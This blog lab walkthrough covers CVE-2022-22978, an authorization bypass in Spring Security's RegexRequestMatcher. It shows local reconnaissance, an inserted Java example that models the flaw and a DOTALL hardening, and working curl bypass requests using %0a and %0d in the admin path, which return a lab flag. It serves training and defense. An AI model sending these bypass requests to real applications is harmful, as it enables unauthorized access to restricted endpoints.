Lab Walkthrough — Authorization Bypass in RegexRequestMatcher [CVE-2022-22978]

Pentester Academy Blog, Apr 20, 2023

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Introduction

What is Spring Security?

Spring Security is a powerful and highly customizable authentication and access-control framework. It is the de-facto standard for securing Spring-based applications.

Spring Security is a framework that focuses on providing both authentication and authorization to Java applications. Like all Spring projects, the real power of Spring Security is found in how easily it can be extended to meet custom requirements.

Reference: https://spring.io/projects/spring-security

Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured so that it is bypassed on some servlet containers. Applications using RegexRequestMatcher with a "." in the regular expression are possibly vulnerable to an authorization bypass.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-22978

NVD has assigned a base score of 9.8 (Critical) to this vulnerability!

The vulnerability

Applications using RegexRequestMatcher with a regular expression that contains "." (as well as "*") are likely vulnerable to an authorization bypass in the following Spring Security versions:

  • 5.5.x prior to 5.5.7
  • 5.6.x prior to 5.6.4
  • Earlier unsupported versions

Reference: https://tanzu.vmware.com/security/cve-2022-22978

Lab Environment

In this lab environment, the user gets access to a low-privileged shell on an Ubuntu CLI instance. The root user on the same Ubuntu instance is hosting an application leveraging Spring Security that is vulnerable to CVE-2022-22978 and is reachable with the tools installed on the Ubuntu machine at http://127.0.0.1:8080.

Objective: Exploit the authorization bypass in RegexRequestMatcher in the vulnerable Spring Security-based application to access the restricted endpoint /admin/index.

https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/24fe9c5e-582f-4495-b8aa-20f3ddaf9770

Acknowledgments

The setup code is based on the following GitHub repository: https://github.com/DeEpinGh0st/CVE-2022-22978

Tools

The best tools for this lab are:

  • cURL
  • Nmap

Solution

Step 1: Scan the machine for open ports using Nmap.

Once the lab link is opened, you should have access to an Ubuntu CLI instance.

Run the following command to scan the machine for open ports:

Command:

nmap 127.0.0.1

Port 8080 is open!

Step 2: Check the running processes and listening connections list.

List the running processes:

Command:

ps aux

Notice the java process is running with root privileges.

Check the complete line for that process entry (we could have checked the /proc//cmdline file as well):

Command:

ps aux > out

cat out

It is a Spring Security-based application.

Check for the active listening TCP ports:

Command:

ss -pant

Port 8080 is the only candidate on which the Spring Security-based application might be listening.

This can be confirmed by sending a curl request to the candidate port.

Step 3: Send a request to the Java application on port 8080.

Command:

curl http://127.0.0.1:8080

Notice one link in the response: /admin/index.

Request the contents of that link:

Command:

curl http://127.0.0.1:8080/admin/index

The response says Forbidden, so this must be a route restricted to authenticated users.

Step 4: Search for Spring Security authorization bypass exploits.

Search Query: spring security authorization bypass

As stated on Snyk’s website: org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured so that it is bypassed on some servlet containers when it is used with a "." in the regular expression.

Check the PoC link:

URL: https://github.com/ducluongtran9121/CVE-2022-22978-PoC

On that page, the bypass for routes protected with regexMatcher is listed:

We can supply %0a or %0d in the URI to bypass the authorization checks and access the restricted endpoint! The reason is that "." in java.util.regex does not match line terminators by default, so a path containing a raw newline or carriage return fails to match the protected-route pattern and the request falls through to the less restrictive rules.
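The following is an added example, not code from the lab or from Spring Security: it models the RegexRequestMatcher decision with plain java.util.regex so the mismatch can be reproduced, and checked against a hardened pattern, without a servlet container. The protected-route pattern "/admin/.*" and the sample paths are assumptions chosen to mirror this walkthrough.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example: a minimal model of how a regex route matcher decides whether a
 * request path is covered by a protected-route rule.
 */
public class RegexMatcherCheck {

    // Hypothetical protected-route pattern, written the way a vulnerable config would.
    // "." is meant to mean "any character", but java.util.regex excludes line terminators.
    static final String ADMIN_PATTERN = "/admin/.*";

    // Weak behaviour: the pattern compiled with default flags, so "." stops at \n and \r.
    static final Pattern VULNERABLE = Pattern.compile(ADMIN_PATTERN);

    // Hardened behaviour: DOTALL makes "." match line terminators too, so a path with an
    // embedded \n or \r is still caught by the protected-route rule. Upgrading to the
    // fixed Spring Security releases listed in the advisory is the proper remediation.
    static final Pattern HARDENED = Pattern.compile(ADMIN_PATTERN, Pattern.DOTALL);

    /** RegexRequestMatcher uses a full match (matches()) against the request path. */
    static boolean protectedBy(Pattern rule, String path) {
        return rule.matcher(path).matches();
    }

    public static void main(String[] args) {
        // Constructed sample paths, including the encoded forms used in the walkthrough.
        List<String> encoded = List.of(
                "/admin/index",
                "/admin/%0aindex",
                "/admin/%0dindex",
                "/admin/index%0a",
                "/admin/index%0d");

        for (String raw : encoded) {
            // The container hands the matcher the decoded path, with a raw \n or \r inside.
            String path = URLDecoder.decode(raw, StandardCharsets.UTF_8);
            System.out.printf("%-18s default-flags protects: %-5s  DOTALL protects: %s%n",
                    raw, protectedBy(VULNERABLE, path), protectedBy(HARDENED, path));
        }
    }
}
```

Only the first path is protected by the default-flags pattern; all five are protected once DOTALL is applied. A container that rejects raw line terminators in the path never reaches the weak matcher with such input, which is why the advisory scopes the issue to "some servlet containers".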

Step 5: Exploit CVE-2022-22978 to bypass the enforced authorization checks.

Send the following curl request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0aindex

The flag is returned in the response:

Flag: 23e0520ade6129343e4c1d9fd63120ea

Alternatively, send the following request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0dindex

Curious readers can try these requests as well; they bypass the authorization in the same way:

Command:

curl http://127.0.0.1:8080/admin/index%0a

Command:

curl http://127.0.0.1:8080/admin/index%0d

With that, we conclude this lab on authorization bypass in RegexRequestMatcher in Spring Security-based applications.

References

Try this exploit for yourself! Sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Originally published at https://ine.com.